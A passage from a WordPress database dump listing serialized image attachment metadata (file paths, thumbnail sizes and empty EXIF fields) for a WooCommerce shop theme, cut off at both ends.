-slide1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-slide1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-slide1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-slide1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h1-slide1-399x300.png\";s:5:\"width\";i:399;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h1-slide1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h1-slide1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-slide1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(651,838,'_wp_attached_file','2018/01/blog-img-7.jpg'),(652,838,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:734;s:4:\"file\";s:22:\"2018/01/blog-img-7.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"blog-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"blog-img-7-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"blog-img-7-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"blog-img-7-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"blog-img-7-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"blog-img-7-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"blog-img-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"blog-img-7-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"blog-img-7-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"blog-img-7-550x734.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"blog-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"blog-img-7-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(653,1162,'_wp_attached_file','2018/01/product3-gallery1.jpg'),(654,1162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product3-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product3-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product3-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(655,3229,'_wp_attachment_image_alt',''),(656,4211,'_wp_attachment_image_alt','a'),(657,4225,'_wp_attachment_image_alt','o'),(658,3231,'_wp_attached_file','2018/02/h3-slide1-graphic4-1.png'),(659,3231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:878;s:6:\"height\";i:296;s:4:\"file\";s:32:\"2018/02/h3-slide1-graphic4-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-300x296.png\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-600x202.png\";s:5:\"width\";i:600;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-300x101.png\";s:5:\"width\";i:300;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-768x259.png\";s:5:\"width\";i:768;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-630x296.png\";s:5:\"width\";i:630;s:6:\"height\";i:296;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-550x296.png\";s:5:\"width\";i:550;s:6:\"height\";i:296;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-550x296.png\";s:5:\"width\";i:550;s:6:\"height\";i:296;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-300x296.png\";s:5:\"width\";i:300;s:6:\"height\";i:296;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-600x202.png\";s:5:\"width\";i:600;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide1-graphic4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(660,1158,'_wp_attachment_image_alt','q'),(661,1162,'_wp_attachment_image_alt','a'),(662,4228,'_wp_attached_file','2018/03/favicon-img-1.png'),(663,4228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:25:\"2018/03/favicon-img-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"favicon-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(664,1163,'_wp_attached_file','2018/01/product3-gallery2.jpg'),(665,1163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product3-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product3-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product3-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(666,1520,'_wp_attachment_image_alt','a'),(667,1162,'_wp_attachment_image_alt','a'),(668,1163,'_wp_attachment_image_alt','a'),(669,1525,'_wp_attached_file','2018/01/h7-img-2.jpg'),(670,1525,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:748;s:4:\"file\";s:20:\"2018/01/h7-img-2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-2-241x300.jpg\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h7-img-2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-2-550x748.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:748;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(671,129,'_wp_attached_file','2018/01/h1-img1.png'),(672,129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:205;s:6:\"height\";i:205;s:4:\"file\";s:19:\"2018/01/h1-img1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(673,4229,'_wp_attached_file','2018/01/h1-img1-1.png'),(674,4229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:205;s:6:\"height\";i:205;s:4:\"file\";s:21:\"2018/01/h1-img1-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(675,1164,'_wp_attached_file','2018/01/product3-gallery3.jpg'),(676,1164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product3-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product3-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product3-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product3-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(677,2168,'_wp_attachment_image_alt','a'),(678,2169,'_wp_attachment_image_alt','a'),(679,129,'_wp_attachment_image_alt','a'),(680,4229,'_wp_attachment_image_alt','a'),(681,2169,'_wp_attachment_image_alt','a'),(682,2170,'_wp_attached_file','2018/01/product-3.jpg'),(683,2170,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-3.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-3-300x240.jpg\";s:5:\"width\";i: